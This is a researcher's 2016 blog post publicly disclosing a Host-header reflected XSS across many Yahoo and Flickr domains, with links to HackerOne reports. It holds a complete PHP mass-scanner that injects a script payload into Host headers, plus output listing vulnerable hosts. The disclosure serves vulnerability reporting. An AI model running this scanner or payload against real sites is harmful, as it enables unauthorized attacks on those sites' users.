Intro

Seems it’s time to disclose 21 zero day XSS on Yahoo.
I do not break any rules, any laws of any country (I hope lol) posting this to public (Yahoo officially said that they need only 90 days to rollout fix for any vuln, please visit https://hackerone.com/yahoo – Yahoo’s bugbounty rules). This vuln affect 21 different Yahoo domains and not fixed for a one year.

I reported this issue 9 months ago (https://hackerone.com/reports/77385), tried to bump it but no luck. They said that my report is dup of https://hackerone.com/reports/54625 (reported at ~march 2015).

Main purpose of this post – just pay attention of Yahoo security team to this ticket again (and finally fix!).

XSS

Facts:

  • Reflected
  • Works only in IE (tested in IE 10/Win 7; Should works in 7,8,9)
  • Bypassing IE XSS filter

Based on https://twitter.com/Black2Fan technique that helps to inject XSS payload into HOST header of user’s requests (read more here).

PoC: https://sergeybelove.ru/exploits/yahoo_ie.php (IE only! Just inject H1 tag)

Screen Shot 2015-07-21 at 10.54.58 PM

Screen Shot 2015-07-21 at 11.00.50 PM

This XSS caused is by balancer and… affect other domains! I wrote a simple scanner:

<?php

$html = file_get_contents("https://everything.yahoo.com/");
preg_match_all("/.dd..a.href=.([a-zA-Z\.:\/?_=]*)\"/", $html, $matches);
$domains = array();
foreach ($matches[1] as $match) {
    $target = parse_url($match);
    $domains[] = $target['host'];
}
$domains =array_unique($domains);
sort($domains);

//$domains = array($argv[1]);
foreach ($domains as $domain) {
    $fp = @fsockopen($domain, 443, $errno, $errstr, 3);
    if (!$fp) {
	$schemas = array('http', 'https');
    } else {
	$schemas = array('http');
    }
    foreach ($schemas as $scheme) {
	// we need to try valid 80 & 443 and some non valid ports 444
	foreach (array(80,443,444) as $port) {
	    $testing =  $scheme."://".$domain;
	    $payload = "123123--><script>alert(document.location.origin)</script>";
	    $exploit ='<?php
header("Location: '.$scheme.'://'.$domain.'%2f--><script>alert(document.location.origin)<%2fscript>%3a'.$port.'");';
	    $ch = curl_init();
	    curl_setopt($ch, CURLOPT_URL, $scheme."://".$domain);
	    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: '.$domain.$payload.':'.$port));
	    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
	    $result = curl_exec($ch);
	    if (strstr($result, $payload)) {
		echo $testing." with Host: ".$domain.$payload.":".$port." is vulnerable!\n";
		break;
 	    }
	}
    }
}
?>

For mass checking and found that other domains (include flickr.com) also vulnerable:

http://advertising.yahoo.com with Host: advertising.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://answers.yahoo.com with Host: answers.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://autos.yahoo.com with Host: autos.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://celebrity.yahoo.com with Host: celebrity.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://developer.yahoo.com with Host: developer.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://finance.yahoo.com with Host: finance.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://games.yahoo.com with Host: games.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://groups.yahoo.com with Host: groups.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://help.yahoo.com with Host: help.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://messenger.yahoo.com with Host: messenger.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://music.yahoo.com with Host: music.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://my.yahoo.com with Host: my.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://news.yahoo.com with Host: news.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://shopping.yahoo.com with Host: shopping.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://sports.yahoo.com with Host: sports.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://weather.yahoo.com with Host: weather.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://www.flickr.com with Host: www.flickr.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://www.yahoo.com with Host: www.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!

Why 21? Some other domains like mail on first screen should to be checked manually.

One more fact: I added check for XSS thru HOST header to my small and free one-button-scan – http://sergeybelove.ru/one-button-scan/

P.S. I found exactly same vuln on wikipedia and they fixed it just in few days – feel the difference.

UPD: BlackFan twitted that he reported this issue 2 years ago! And it was a dup
H1 report by BlackFan

2838 Total Views 3 Views Today

February 28th, 2016

Posted In: bugbounty